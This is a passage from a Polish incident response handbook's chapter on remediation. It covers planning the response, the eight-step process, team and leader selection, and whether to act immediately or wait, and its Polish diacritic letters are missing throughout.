sposb zastosowania tej wiedzy do przypadkw opisanych w rozdziale 1.
Naszym celem jest przedstawienie metod sporzdzania kompletnego planu naprawczego.
Tworzenie takiego planu nie jest atwym zadaniem, poniewa trzeba uwzgldni wszystkie aspekty
nawet najtrudniejszych do rozwizania spraw. Oczywicie nie zawsze konieczne jest tak dokadne
planowanie dziaania, ale trzeba by przygotowanym na wszystko. Na pocztku tego rozdziau
wprowadzamy kilka podstawowych poj dotyczcych technik naprawczych. Nastpnie szczegowo
je omawiamy i na zakoczenie opisujemy konkretny przykadowy scenariusz ich wdroenia.
PODSTAWOWE POJCIA
Wdraanie czynnoci naprawczych po powanym incydencie to skomplikowany proces. Aby uatwi
sobie objanianie pewnych aspektw tego dziaania, postanowilimy wprowadzi kilka podstawowych
poj. Dotycz one oglnych czynnoci, rodzajw akcji naprawczych oraz typowych czynnikw
majcych kluczowe znaczenie dla procesu naprawy. Plan naprawczy zazwyczaj skada si z dwch
czci. Najpierw naley skupi si na zaegnaniu biecego niebezpieczestwa (wdroenie wstpnych
rodkw naprawczych, ograniczenie zagroenia i jego likwidacja), a nastpnie poprawi poziom
zabezpiecze organizacji (dziaania strategiczne). Jak zawsze, gdy trzeba przeprowadzi jak
skomplikowan akcj, im lepiej wszystko zaplanujemy, tym sprawniej bdziemy pracowa.
Wstpny plan naprawczy powinien obejmowa wszystkie rodki, jakie naszym zdaniem organizacja
jest w stanie wdroy przed eliminacj zagroenia (eradykacj). Pniej w czasie ledztwa plan ten
wielokrotnie ulega zmianom, poniewa niektre punkty okazuj si znacznie trudniejsze do realizacji,
ni si pocztkowo wydawao. Propozycje takie z reguy przesuwamy do listy zalece strategicznych,
chyba e bez nich nie moe by mowy o powodzeniu biecych czynnoci.
Uwaga Jeli jaki punkt wstpnego planu eliminacji zagroenia okazuje si zbyt trudny do wdroenia na
tym etapie pracy, naley go rozoy na czynniki, wybra najwaniejsze elementy do zastosowania
od zaraz, a pozostae przesun do planu strategicznego. Przykadem moe by zalecenie globalnej
implementacji uwierzytelniania dwuskadnikowego. Niektrzy nasi klienci nie byli w stanie tego
wykona przed likwidacj zagroenia, wic wybierano tylko pewne grupy uytkownikw.
Z taktycznego punktu widzenia dwie najwaniejsze grupy, ktrych procesy powinno si zmieni,
to kadra kierownicza i wszyscy administratorzy systemw. Zmiany u pozostaych osb mona
odoy na pniejszy termin. Taki sposb dziaania pozwala ograniczy zasig dziaalnoci hakerw,
jeli ewentualnie sprbuj powrci.
ROZDZIA 17. WPROWADZENIE DO TECHNIK NAPRAWCZYCH 531
Wprowadzanie szeroko zakrojonych zmian majcych na celu popraw bezpieczestwa podczas

ledztwa, cho kuszce, nie jest zalecane lepiej poczeka z tym na zakoczenie incydentu.
Dobrym sposobem na sporzdzenie wstpnego planu naprawczego jest zorganizowanie burzy
mzgw na temat kadego obszaru uwzgldnionego w tabeli planowania procesu naprawy,
ktr przedstawiamy dalej w tym rozdziale.
Poziom szczegowoci planu naprawczego moe si rni w zalenoci od indywidualnych
cech incydentu. Niektre organizacje preferuj drobiazgowe plany ze schematami tworzonymi
w programach Microsoft Project, arkuszach kalkulacyjnych programu Microsoft Excel itp. Inne
z kolei wol jak najmniej szczegw i jak najwicej rozwiza oglnych, gdy ufaj, e pracownicy
dadz sobie ze wszystkim rad. Plan naprawczy powinien by tak skonstruowany, aby zawiera
wszystkie informacje potrzebne do wdroenia zawartych w nim zalece. W rozdziale tym nie
opisujemy konkretnych sposobw dokumentowania rnych czci planu naprawczego.
Przykadowy arkusz kalkulacyjny i plan przedstawiamy w nastpnym rozdziale.
Na rysunku 17.1 ukazano proces naprawczy w postaci schematu, ktrego poszczeglne
elementy s dokadnie objanione dalej w tym rozdziale. Jeli pogubisz si w trakcie studiowania
tekstu, zawsze moesz wrci do tego schematu, aby przypomnie sobie, o co w tym wszystkim
chodzi. Proces naprawy jest skomplikowany, wic musisz przeczyta cay rozdzia, aby go dokadnie
zrozumie i nauczy si go prawidowo przeprowadza.
Proces naprawczy skada si z nastpujcych omiu etapw.
1. Budowa zespou naprawczego zesp naprawczy kompletuje si dopiero po stwierdzeniu,
e rzeczywicie doszo do incydentu bezpieczestwa, i okreleniu jego przynalenoci.
W rozdziale 2. opisalimy sposb tworzenia zespou ledczego. Zesp naprawczy wyglda
podobnie i powinien mie w swoich szeregach przedstawicieli prawnikw, informatykw
(zarwno od infrastruktury, jak i pomocy technicznej), specjalistw od zabezpiecze oraz
kadry kierowniczej.
2. Okrelenie punktw czasowych dyrektorzy we wsppracy z prawnikami oraz czonkami
zespow naprawczego i ledczego powinni zdecydowa, jakie kroki trzeba przedsiwzi
natychmiast, a co naley odoy do czasu zakoczenia ledztwa. Z dowiadczenia wiemy,
e decyzje te bywaj bardzo rne i w gwnej mierze zale od charakteru incydentu,
postpu ledztwa oraz rodzaju zagroonych informacji.
3. Okrelenie i wdroenie podstawowych czynnoci naprawczych dziaania te
przeprowadza si w trakcie trwania incydentu i czsto polegaj na ulepszeniu
monitorowania systemu i sieci, ograniczeniu krytycznych luk w zabezpieczeniach
oraz przygotowaniu zespow wsparcia na globalne zmiany, takie jak zmiana hase
czy wdroenie uwierzytelniania dwuskadnikowego. Wikszo tego typu czynnoci
jest dla hakera nie do odrnienia od zwykych dziaa serwisowych.
4. Okrelenie i wdroenie rodkw majcych ograniczy zasig incydentu dziaania te
maj na celu uniemoliwienie hakerowi dostpu do wybranych rodowisk lub poufnych
danych w trakcie ledztwa. S to z reguy destrukcyjne krtkoterminowe rozwizania,
ktre da si bardzo szybko zastosowa.
RYSUNEK 17.1. Schemat procesu naprawczego

5. Opracowanie planu likwidacji zagroenia celem planu likwidacji zagroenia jest

uniemoliwienie hakerowi dostpu do rodowiska oraz usunicie w zabezpieczeniach luk,
za pomoc ktrych haker dosta si do systemu. Wszystkie te czynnoci naley dokadnie
opisa w dokumentacji oraz wyprbowa w sposb niezakcajcy ledztwa. Ten etap
procesu naprawczego jest z reguy przeprowadzany pod koniec lub na kocu ledztwa,
gdy znane s ju narzdzia, metody i sposoby dziaania hakera.
6. Okrelenie czasu likwidacji zagroenia i wdraanie planu dziaania w pewnym
momencie ledztwa nastpuje sytuacja, ktr mona okreli jako stan rwnowagi.
Od tej pory, cho mog by odkrywane kolejne przypadki zamania zabezpiecze, nie s ju
wykrywane adne nowe techniki ani narzdzia. Aby plan likwidacji zagroenia by skuteczny,
musi zosta bardzo dobrze przemylany i wykonany w odpowiednim czasie. Gdy analitycy
ledczy dobrze poznaj narzdzia, techniki i procesy, mona przystpi do likwidacji zagroe.
Do etapu tego zalicza si take monitorowanie i weryfikacj skutkw likwidacji zagroe.
7. Opracowanie zalece strategicznych w trakcie ledztwa i procesu naprawczego naley
notowa obszary wymagajce poprawy. Notatki te stanowi pniej podstaw zalece
strategicznych majcych pomc w podniesieniu poziomu bezpieczestwa rodowiska.
Zalecenia strategiczne czsto obejmuj czynnoci naprawcze, ktrych nie mona byo
wdroy przed ledztwem lub w trakcie jego trwania. Zalecenia te bardzo czsto zgadzaj si
z oglnymi najlepszymi praktykami. Ponadto ich wdroenie z reguy wymaga wsppracy
rnych grup specjalistw. Moe doj do zakcenia dziaalnoci firmy, niewykluczone te,
e bdzie trzeba ponie znaczne koszty. Dziaania strategiczne z reguy s przeprowadzane
kilka miesicy, a nawet lat po likwidacji zagroenia.
8. Opis zdobytego dowiadczenia dokumentacja wytworzona podczas ledztwa powinna
by przechowywana w centralnym miejscu, do ktrego dostp, ze wzgldu na poufno
danych, powinni mie tylko czonkowie zespou ds. reakcji na incydent. W przyszoci
dokumenty te bd bezcennym rdem informacji na temat tego, co naley poprawi.
Przykadami takiej dokumentacji s raporty i notatki na temat rodowiska.
Akcja naprawcza powinna by zwiza i skuteczna. Jeli zesp sprbuje wprowadzi powane
zmiany w sytuacji taktycznej, istnieje ryzyko, e efekty bd niekompletne i mao skuteczne.
Musisz sprawdzi, co Twj zesp (i Twoja organizacja) jest w stanie zrobi szybko, a pozostae
zadania przesu do zalece strategicznych. Wdroenie niewielkiej liczby skutecznych zmian jest
zazwyczaj lepszym rozwizaniem ni prba wykonywania wielu czynnoci, ktre maj mniejsze
znaczenie dla konkretnego incydentu.
Nie ma jednej skutecznej strategii dziaania w procesie naprawczym wszystko zaley od wielu
czynnikw, ktre w kadym incydencie s inne. Na podstawie wasnych dowiadcze wyrniamy
siedem najczciej wystpujcych czynnikw o kluczowym znaczeniu dla powodzenia akcji naprawczej.
Powaga incydentu od tego parametru zaley, jakiego rodzaju rodki naprawcze trzeba
zastosowa. Kada organizacja musi we wasnym zakresie stwierdzi, co to znaczy, e
incydent jest powany. Przykadowo bank, z ktrego wyciekaj dane na bieco, szybciej
podejmie dziaania w kierunku ograniczenia rozprzestrzeniania si ataku i likwidacji
zagroenia ni przedsibiorca z brany obronnej zaatakowany przez nieznanego hakera.
Rodzaj incydentu take moe decydowa o jego powadze. Przykadowo usuwanie zagroe
z zewntrznego serwera, ktry zawiera tylko publicznie dostpne informacje, to znacznie
mniej powana sprawa ni dziaanie przeciwko hakerowi, ktry zdoby dane powiadczajce
administratora domeny. Organizacja z ugruntowanymi procesami reakcji na incydenty
powinna mie opisane rne poziomy powagi incydentw, aby specjalici RI mogli szybko
podj odpowiednie dziaania.
Czas wdraania czynnoci naprawczych strony majce wpyw na dziaalno firmy
powinny ustali czas wykonywania czynnoci naprawczych na pocztku procesu planowania.
Niektre dziaania maj na celu natychmiastowe usunicie hakera z systemw zawierajcych
poufne dane, natomiast inne wykonuje si po to, by da zespoowi ledczemu troch czasu
na zebranie odpowiedniej iloci informacji, aby skutecznie pozby si hakera ze rodowiska
i przy okazji wzmocni zabezpieczenia. Cho nie jest moliwe (ani nawet podane) cise
trzymanie si planu ustalonego, zanim w peni zrozumie si natur incydentu, ramy czasowe
nie powinny by zbyt dugie, aby caa akcja zbytnio si nie przecigaa.
Zesp naprawczy przy kompletowaniu zespou naprawczego naley uwzgldni trzy
czynniki: liczebno zespou, poziom umiejtnoci czonkw oraz wsparcie ze strony
kierownictwa. Od liczebnoci zespou zaley jego zdolno do koordynacji dziaa
i rwnolegego przeprowadzania czynnoci. Od poziomu umiejtnoci czonkw zaley
skuteczno prowadzonej akcji. Dowiadczeni specjalici nie bd mieli problemu
z wdraaniem dostosowanych do wasnych potrzeb rozwiza, natomiast mniej
dowiadczeni pracownicy wol raczej posugiwa si tylko tymi narzdziami, z ktrymi
czuj si najbardziej komfortowo. Wsparcie ze strony kierownictwa zapewnia zespoowi
odpowiednie uprawnienia do dziaania i rodki finansowe potrzebne do wdroenia
zabezpiecze.
Technologia typ zastosowanej technologii wpywa na sposb wdraania czynnoci
naprawczych. Wana jest nie tylko technologia zabezpiecze, ale i rozwizanie stosowane
do zarzdzania przedsibiorstwem. Przykadowo w organizacji moe by uywany program
do zmieniania hase do lokalnych kont administratorw w caym przedsibiorstwie.
Jeli nie ma takiego programu, moe by konieczne napisanie skryptu do zmiany hase
do kont administracyjnych we wszystkich systemach.
Uwaga Wdraanie nowej technologii podczas incydentu zazwyczaj przynosi wicej szkd ni poytku.
Wszystkie zasoby (ludzie, czas, pienidze) oddelegowane do implementacji tej nowej technologii
musz zosta zabrane z puli, ktr mona by wykorzysta w ledztwie lub procesie naprawczym.
Oczywicie s wyjtki od tej reguy, np. gdy organizacja ma bardzo dowiadczony i sprawny zesp
ds. bezpieczestwa informatycznego albo od wdroenia pewnej technologii zaley powodzenie
akcji naprawczej.
Budet organizacja dysponujca duym budetem dla rozwiza informatycznych

i zabezpieczajcych moe zakupi i wdroy najlepsze technologie, podczas gdy organizacja
o ograniczonych rodkach finansowych musi zadowoli si taszymi rozwizaniami zastpczymi.
Ponadto dziaania podejmowane w ramach procesu naprawczego musz mie sens

w kontekcie incydentu i w odniesieniu do chronionych danych. Przeznaczenie na
ochron zasobw iloci pienidzy wikszej, ni s one warte, z reguy nie ma sensu.
Wsparcie ze strony kierownictwa w wikszoci przypadkw, aby akcja naprawcza si
powioda, konieczne jest wprowadzenie zmian majcych wpyw na codzienne dziaanie
firmy. Przykadowo zastosowanie niepowtarzajcego si nigdzie indziej hasa do lokalnego
konta administratora lub uytkownika root w kadym systemie wymaga zmiany sposobu
pracy przez wszystkich administratorw. Wsparcie ze strony kierownictwa sprawia,
e nawet najbardziej niewygodne zalecenia zostan wdroone w caej organizacji.
Upublicznienie zdarzenia dzia prawny lub PR firmy moe zosta zmuszony do
ujawnienia informacji o incydencie z powodu wymogw prawnych. Czasami informacje
wyciekaj na zewntrz w sposb niekontrolowany lub zostaj odkryte przez osoby trzecie.
Czasami te haker moe szantaowa organizacj upublicznieniem zdobytych informacji
na jej temat. W kadym z tych przypadkw naley bardzo dokadnie przemyle wszelkie
owiadczenia, jakie zostan zoone publicznie na temat incydentu. Niektre organizacje
spiesz si z ogaszaniem informacji, aby pokaza, e rzeczywicie co robi. Jednak
w miar postpu ledztwa moe si okaza, e niektre przedstawione dane trzeba
skorygowa. Publiczne wycofywanie si z wasnych sw i ich poprawianie jest enujce,
i moe narazi organizacj na ostre ataki. Jeli incydent zostanie szeroko nagoniony
i zyska wielu obserwatorw, prowadzone w zwizku z nim czynnoci zaradcze mog by
kierowane emocjami zamiast faktami.
Przykadem regulacji prawnej, ktra zmusza organizacj do upublicznienia informacji
o incydencie, jest amerykaska ustawa o przenonoci i odpowiedzialnoci w ubezpieczeniach
zdrowotnych (ang. Health Insurance Portability and Accountability Act HIPAA). W myl tej
ustawy wszelkie przypadki wycieku chronionych informacji zdrowotnych lub informacji
osobowych musz by ujawniane. Dla organizacji informujcej publicznie o takim zdarzeniu
korzystne jest podanie dodatkowo informacji o podjtych krokach zaradczych. Dziki temu
wiadomo, e trwaj prace majce na celu zatrzymanie dalszego wycieku informacji i zapewnienie
im lepszej ochrony. Ponadto wymusza to na zespole naprawczym skoncentrowanie si na jak
najszybszym ograniczeniu rozprzestrzeniania si incydentu. Przykadem zaangaowania osoby
trzeciej, ktrego wynikiem jest upublicznienie informacji o incydencie, jest publikacja przez
dziennikarza artykuu w gazecie bez uprzedniego poinformowania o tym organizacji.
Uwaga Wymogi prawne dotyczce ujawniania informacji o wycieku chronionych danych zdrowotnych
mog si rni w zalenoci od kraju. Jeli wic przyjdzie Ci pracowa przy tego typu sprawie,
koniecznie od samego pocztku zaangauj w proces prawnika i dzia PR firmy.
Znasz ju osiem podstawowych krokw procesu naprawczego, wic moemy przej do

omawiania szczegw. Wczeniej jednak chcielibymy opisa dwa testy wstpne, ktre powinno
si przeprowadzi przed kompletowaniem zespou naprawczego. Gdy ju to bdziemy mie
za sob, przejdziemy do szczegw kadego z krokw procesu naprawczego.
TESTY WSTPNE
Przed przystpieniem do kompletowania zespou naprawczego zalecamy wykonanie dwch
testw wstpnych.
Pierwszy ma na celu sprawdzenie, czy organizacja wdroya formaln procedur reakcji na
incydent. Prowadzenie takiej akcji wymaga wielu godzin czasu pracownikw i moe oznacza,
e wiele wanych osb i zespow zostao oddelegowanych do prac zwizanych z incydentem
i oderwanych od normalnych obowizkw. Moe si to wydawa niepotrzebne, ale wane jest,
aby polecenie wszczcia procedury reakcji na incydent wyszo od dyrekcji oraz by proces ten
rozpocz si dopiero po tym, jak to polecenie zostanie wydane.
Drugi test dotyczy sprawdzenia, czy incydentowi zosta przypisany waciciel. Jest to osoba
penica funkcj lidera odpowiedzialnego za komunikacj wewntrz organizacji, z zespoem
ledczym oraz zespoem naprawczym. Wszystkie zespoy musz konsultowa z liderem swoje
dziaania, aby caa akcja bya dobrze skoordynowana i spjna. Byoby to trudne, gdyby nie byo
wiadomo, kogo wyznaczono do tej roli lub, co gorsza, gdyby nie wyznaczono nikogo.
Teraz moemy przej do szczegowego omwienia pierwszego kroku, czyli kompletowania
zespou naprawczego.
KOMPLETOWANIE ZESPOU NAPRAWCZEGO

W podrozdziale tym opisujemy trzy obszary dotyczce budowy zespou naprawczego. Pierwszy to
wybr momentu, w ktrym naley stworzy taki zesp, drugi to rola lidera tego zespou, a trzeci to
sposb wyboru czonkw.
Kiedy utworzy zesp naprawczy

Z naszego dowiadczenia wynika, e zesp naprawczy naley powoa natychmiast po rozpoczciu
ledztwa. Dziki temu jego czonkowie mog od razu przystpi do planowania akcji naprawczej.
Gdy lider incydentu zatwierdzi czas wykonywania poszczeglnych czynnoci naprawczych, zesp
powinien rozpocz oglne dziaania naprawcze i nakierowane na ograniczenie zasigu incydentu
oraz przystpi do planowania procesu cakowitej likwidacji zagroenia.
Rwnoczesna praca zespow ledczego i naprawczego skraca czas dzielcy moment odkrycia
incydentu od momentu rozpoczcia procesu likwidacji zagroenia. Okres ten nazywa si czasem
do naprawy (ang. time to remediate). Jednym z celw, do ktrych d wszystkie organizacje
zajmujce si bezpieczestwem informatycznym, jest osignicie jak najkrtszego redniego czasu
naprawy (ang. mean time to remediate MTTR). Niektre organizacje definiuj nawet
akceptowalne wartoci wskanika MTTR dla rnych rodzajw incydentw. Jeli np. szkodliwy
program zosta wykryty 25 stycznia, ledztwo wykazao, e do wamania doszo 15 stycznia,
a system zosta odbudowany 26 stycznia, to redni czas naprawy wynosi dwadziecia cztery
godziny (incydent wykryto 25 stycznia, a likwidacja zagroenia nastpia 26 stycznia, wic w cigu
dwudziestu czterech godzin). Mimo e samo wamanie zostao wykryte dopiero po dziesiciu dniach,
utrzymywanie niskiej redniej jest bardzo wane. Jeli wemiemy pod uwag to, e wikszo
organizacji nie wykrywa samodzielnie zama zabezpiecze, tylko jest o tym informowana
przez podmioty zewntrzne, krtki czas naprawy jest tak samo wany jak szybkie wykrywanie
incydentw.
Teraz przejdziemy do kwestii wyznaczania lidera procesu naprawczego.
Wyznaczanie lidera procesu naprawczego

Najwaniejszym aspektem formowania zespou naprawczego jest wyznaczenie lidera. Jest to osoba
odpowiedzialna za cay proces naprawczy i penica rol porednika komunikacyjnego midzy
pracownikami z dziaw technicznych i nietechnicznych. Oprcz typowych dziedzin zwizanych
z reakcj na incydent, lider procesu naprawczego musi te zna si na innych zagadnieniach,
takich jak sposoby przepywu danych, operacje biznesowe, strategia firmy, PR, zarzdzanie
zasobami ludzkimi oraz aspekty prawne. Jako e w skad zespou wchodz zarwno osoby z wiedz
techniczn, jak i nietechniczn, najlepszym kandydatem na stanowisko lidera zespou jest osoba
z duym dowiadczeniem technicznym. Czasami w roli tej dobrze moe si sprawdzi kierownik
projektw, jeli da si mu do wsppracy odpowiednich ludzi. Jednak z reguy lepsze do tego zadania
s dowiadczone osoby z wiedz techniczn. Oprcz posiadania dowiadczenia technicznego,
osoba ta powinna orientowa si w innych kwestiach zwizanych z dziaaniem firmy. Wiedza
umoliwia prawidowe kierowanie zespoem i pozwala doradza innym w kwestiach wdraania
okrelonych dziaa. Ponadto lider zespou naprawczego musi mie pene poparcie ze strony
kierownictwa organizacji, aby mg podejmowa rne decyzje i dziaania.
Wiele aspektw procesu naprawczego trudno wdroy, a niektre z nich mog te powodowa
zakcenia w dziaalnoci organizacji. Silny lider zespou naprawczego musi dobrze motywowa
zesp i doprowadza trudne sprawy do koca. Do tego potrzebna jest osoba energiczna i potrafica
skutecznie rozwizywa konflikty. Przykadem trudnej do przeprowadzenia akcji jest skoordynowane
wymuszenie zmiany hase do kont w caym rodowisku. Ze zwykymi uytkownikami nie ma zwykle
wikszych problemw, ale konta administratorw lokalnych i usug oraz dane powiadczajce
tosamo wpisane w skrypty i aplikacje zawsze mno trudnoci. Ponadto w wielu przypadkach
wymagane jest, aby wszystkie hasa do kont zostay zmienione w krtkim czasie (np. w cigu doby
lub czterdziestu omiu godzin). Tego typu akcje zazwyczaj spotykaj si z chodnym przyjciem ze
strony pracownikw, ktrzy maj je przeprowadzi z pewnoci bd protestowa i domaga si
wyjanie, po co wykonywa tak czasochonne czynnoci. Niestety nawet jedno pominite konto
moe zniweczy cay wysiek.
Czasami za ledztwo i proces naprawczy odpowiada jedna osoba. Tego typu rozwizanie
najczciej jest stosowane w przypadku mniej skomplikowanych incydentw. Jeli jednak sprawa
jest bardziej zoona lub incydent obejmuje due rodowisko, powinno si wyznaczy osobnych
liderw do incydentu, ledztwa i procesu naprawczego. Dziki temu kady z nich moe skupi si
tylko na swojej dziace.
Kandydat na lidera zespou naprawczego powinien odznacza si picioma kluczowymi

przymiotami. S one podstaw, mimo e kady incydent i kada akcja naprawcza s inne.
Poniej znajduje si lista tych cech, a pod ni bardziej szczegowy opis kadej z nich.
Dogbna wiedza informatyczna i na temat bezpieczestwa informatycznego.
Orientacja na dziaanie.
Rozumienie wewntrznych zasad panujcych w organizacji.
Udowodnione sukcesy w szukaniu wsparcia dla inicjatyw.
Umiejtno porozumiewania si zarwno z pracownikami z dziaw technicznych,
jak i nietechnicznych.
Wiedza informatyczna i rozumienie zagadnie zwizanych z bezpieczestwem informatycznym
s kluczowe, poniewa kandydat bdzie wsppracowa bezporednio ze specjalistami odpowiedzialnymi
za przygotowywanie akcji naprawczych i jednym z jego zada bdzie ocena ich wykonalnoci.
Ponadto osoba ta musi by w stanie zrozumie natur incydentu i ledztwa na tyle dobrze,
by odpowiednio pokierowa dziaaniami zespou. Niejednokrotnie bylimy wiadkami sytuacji,
w ktrych lenistwo i samozadowolenie przewayyby, gdyby lider nie rozumia doskonale
zagadnie informatycznych i nie potrafi odrzuci niektrych obiekcji zgaszanych przez czonkw
zespou. Wiedza informatyczna i na temat bezpieczestwa komputerowego to chyba jedna
z najczciej zaniedbywanych cech dobrego lidera zespou naprawczego w wielu organizacjach
przyjmuje si, e dobrzy kierownicy projektw s te dobrymi liderami zespow naprawczych,
poniewa maj dowiadczenie w planowaniu skutecznych dziaa (to te jest wane, ale nie tak,
jak wiedza techniczna).
Lider zespou naprawczego musi by zorientowany na wyniki. Niektrzy nazywaj t cech
koncentracj na dziaaniu. Mniejsza o nazwy lider musi umie rozwija, mierzy i wytwarza
wyniki. Musi zna si na przydzielaniu zada, powanie traktowa kwestie odpowiedzialnoci,
do koca wykonywa powierzone mu zadania oraz wymaga tego samego od innych. Kompletny
plan naprawczy jest bezuyteczny, jeli nie ma komu go waciwie wdroy w odpowiednim czasie.
Wana, cho moe niekonieczna, jest te umiejtno szybkiego podejmowania decyzji na podstawie
niepenych informacji. W wikszoci akcji naprawczych wystpuj nieoczekiwane komplikacje oraz
dochodzi do przekroczenia budetu i zaplanowanego czasu. Jeeli swoimi dziaaniami sprawimy,
e haker zorientuje si, i zosta wykryty, lider procesu naprawczego musi umie szybko dziaa,
aby przeciwstawi si potencjalnej ofensywie hakera. W takim przypadku wana jest umiejtno
szybkiego reagowania w dynamicznej sytuacji.
Znajomo wewntrznych zasad panujcych w organizacji jest liderowi niezbdna do tego,
by wdroy rozwizania naprawcze w sposb niedezorganizujcy dziaalnoci firmy. Od tej wiedzy
moe zalee decyzja, czy przeprowadzi skomplikowan akcj, czy nie. Jeli np. lider zespou
naprawczego wie, e szef dziau informatyki niechtnie zgadza si na radykalne zmiany, powinien
z nim si spotka, aby omwi szczegy planowanego procesu. Jeli oczekiwania zostan
sformuowane, zanim organizacja znajdzie si pod presj incydentu, o wiele atwiej bdzie
wdroy potrzebne rozwizania.
Ponadto lider zespou naprawczego musi umie znale poparcie dla swojego planu. Konieczne
bdzie podjcie wielu trudnych decyzji, w efekcie ktrych dojdzie np. do kosztownych przerw
w dziaaniu systemw biznesowych. W takim przypadku lider musi zdoby poparcie najwaniejszych
decydentw (z reguy dyrektorw, kierownikw linii produktw i starszych inynierw). Tylko to
moe mu zapewni powodzenie. Zdobycie poparcia dla rnych inicjatyw czsto jest uzalenione
od umiejtnoci przedstawienia w sposb jasny, jakie ryzyko i potencjalne korzyci wi si z danymi
czynnociami. W takich przypadkach kluczowe znaczenie ma zdolno do przekazywania technicznej
wiedzy osobom z nietechnicznych dziaw. aden dyrektor nie zechce sucha o tym, jak wdroenie
okrelonych zabezpiecze podniesie poziom bezpieczestwa firmy, jeli ma si to odbi na
skutecznoci jej dziaania. Dyrektorzy wol raczej wiedzie, jak dana technologia zwikszy poziom
bezpieczestwa firmy i ochroni jej interesy. Nawet trudne operacje wymagajce zmiany sposobu
dziaania firmy mog spotka si z uznaniem i zyska poparcie, jeli zostan w odpowiedni sposb
przedstawione zwierzchnikom.
Umiejtno komunikacji z osobami z dziaw technicznych i nietechnicznych jest kluczow
cech lidera zespou naprawczego. Osoba ta musi umie porozumie si ze swoimi pracownikami,
aby oceni, czy formuowane przez nich zalecenia s korzystne zarwno z punktu widzenia procesu
naprawczego, jak i oglnego bezpieczestwa organizacji. Ponadto lider musi wiedzie, jak rozmawia
ze zwierzchnikami, posugujc si ich jzykiem, aby prawidowo przedstawi im wszystkie zalety
i wady rnych dziaa. Przykadowo lider zespou naprawczego musi odpowiednio poinformowa
o tym, jakie ryzyko wie si z odczeniem internetu od wszystkich systemw na pierwszym etapie
procesu likwidacji zagroenia. Dyrektorzy musz rozumie, jakie skutki bdzie mia tak drastyczny
krok jak odcicie od internetu, ktry z pewnoci zaburzy dziaalno firmy na jeden czy dwa dni.
Czonkowie zespou naprawczego

W rozdziale 2. opisalimy skad zespow ledczego, naprawczego i pomocniczego. Przypominamy,
e w skad zespou naprawczego powinny wchodzi przynajmniej nastpujce osoby: kto z zespou
ledczego, reprezentanci systemw, sieci i aplikacji oraz rni inni eksperci (jeli bdzie trzeba).
Zesp naprawczy musi mie wiedz i autorytet, aby skutecznie wprowadza zmiany. W rozdziale 2.
opisalimy te czonkw zespou pomocniczego, ktrzy mog mie kluczowe znaczenie dla powodzenia
operacji naprawczej, tylko s bardziej nastawieni na wykonywanie konkretnych zada. W grupie
tej mog znajdowa si prawnicy z zewntrz, audytorzy, kierownicy linii produktw, specjalici
od zasobw ludzkich i PR oraz dyrektorzy.
Oto kilka powodw, dla ktrych osoby te rwnie s wane.
Czonek zespou ledczego posiada cenn wiedz o aktywnoci hakera i tym, jakie dziaania
mona podj, aby zminimalizowa szkody. Ponadto osoba ta wie, jakie dziaania naprawcze
mog zaalarmowa hakera (jeli zdecydujemy si na poczekanie troch z akcj naprawcz).
Administratorzy systemw, sieci i aplikacji najlepiej wiedz, jakie s moliwoci
przeprowadzenia zalecanych czynnoci oraz jakie bd ich efekty dla organizacji.
Wiedza o systemach i aplikacjach umoliwia im proponowanie alternatywnych rozwiza,
jeli wstpne propozycje oka si niemoliwe do wykonania.
Eksperci s niezastpieni, gdy w proces naprawczy zaangaowane s nietypowe systemy,

takie jak np. systemy ogosze czy ICS.
Reprezentanci innych dziaw maj do zaoferowania cenne spostrzeenia i wsparcie
w kwestiach nietechnicznych, ktre zesp naprawczy te moe napotka.
Uwaga W skad wielu zespow ds. reakcji na incydent od samego pocztku wchodz prawnicy (z tej samej
lub zewntrznej firmy albo jedni i drudzy). Dziki temu nie ma wtpliwoci dotyczcych zgodnoci
z prawem rnych dziaa. Czasami, gdy w prowadzeniu reakcji na incydent pomaga obca firma,
obecno w ekipie prawnika, zwaszcza z firmy zewntrznej, pomaga zachowa przewag
na wypadek rozprawy sdowej.
Jednym z pierwszych zada, z jakimi musi si upora zesp naprawczy, jest wybr sposobu
dziaania. W nastpnym podrozdziale opisujemy rne metody prowadzenia akcji naprawczej
oraz zwizane z nimi kwestie, ktre naley rozway.
CZAS ROZPOCZCIA AKCJI

Wyrnia si trzy metody prowadzenia akcji naprawczej: natychmiastow, opnion i mieszan.
Lider ds. incydentu w porozumieniu z liderami zespow ledczego i naprawczego powinien
wybra jedn z tych metod, zanim jeszcze zostan wykonane jakiekolwiek kroki naprawcze.
Wybr sposobu dziaania zaley od siedmiu opisanych wczeniej czynnikw dotyczcych
incydentu, ktre maj krytyczne znaczenie dla akcji naprawczej. Czasami trudno wybra
odpowiedni metod dziaania ju na samym pocztku reakcji na incydent. Z dowiadczenia
moemy stwierdzi, e standardowo powinno si stosowa podejcie opnione i ewentualnie
zmienia je, gdy zaistniej odpowiednie przesanki w postaci materiau dowodowego. Poniej
znajduje si szczegowy opis tych trzech rodzajw podejcia do procesu naprawczego.
Akcja natychmiastowa celem tego dziaania jest zatrzymanie postpu incydentu
(ograniczenie jego zasigu). Ten sposb dziaania powinno si stosowa, gdy korzyci
z natychmiastowego zatrzymania hakera przewaaj nad korzyciami z dalszego
prowadzenia ledztwa. W efekcie tych czynnoci haker z reguy dowiaduje si, e zosta
wykryty, wic jest to odpowiednia metoda do stosowania w przypadkach incydentw,
w ktrych haker cay czas jest aktywny.
Ten sposb dziaania jest odpowiedni w wielu sytuacjach, np. gdy przedsibiorstwo traci
pienidze przez Zautomatyzowan Izb Rozliczeniow lub z powodu wycieku danych kart
kredytowych, gdy nieuczciwy pracownik kopiuje dane na nonik USB i planuje je sprzeda
konkurencji oraz gdy zasig incydentu jest niewielki i ogranicza si np. tylko do jednego
systemu. Podejcie to nie jest natomiast odpowiednie w przypadkach, gdy haker zama
zabezpieczenia setek systemw i zainstalowa w nich wiele rnych rodzajw backdoorw
natychmiastowa akcja w takiej sytuacji spowodowaaby tylko zmian narzdzi i technik
przez hakera, przez co zesp ledczy musiaby od nowa okreli zasig ataku.
Akcja opniona metoda polega na poczekaniu na zakoczenie ledztwa i dopiero

potem podjciu rodkw przeciwko hakerowi. W trakcie dochodzenia naley uwaa, aby
intruz nie zorientowa si, e zosta wykryty. To podejcie stosuje si wwczas, gdy ledztwo
jest przynajmniej tak samo wane jak naprawa. Najczciej na tak form reakcji organizacje
decyduj si, gdy w gr wchodzi kradzie wasnoci intelektualnej lub korzyci z monitorowania
aktywnoci hakera przewaaj nad ryzykiem pozwolenia mu na dziaanie jeszcze przez
pewien czas. Przykadami sytuacji, w ktrych metoda ta jest dobrym wyjciem, s przypadki
szpiegostwa w firmie i infekcje setek systemw, ktre wymagaj dokadnego zbadania
w celu okrelenia zasigu incydentu.
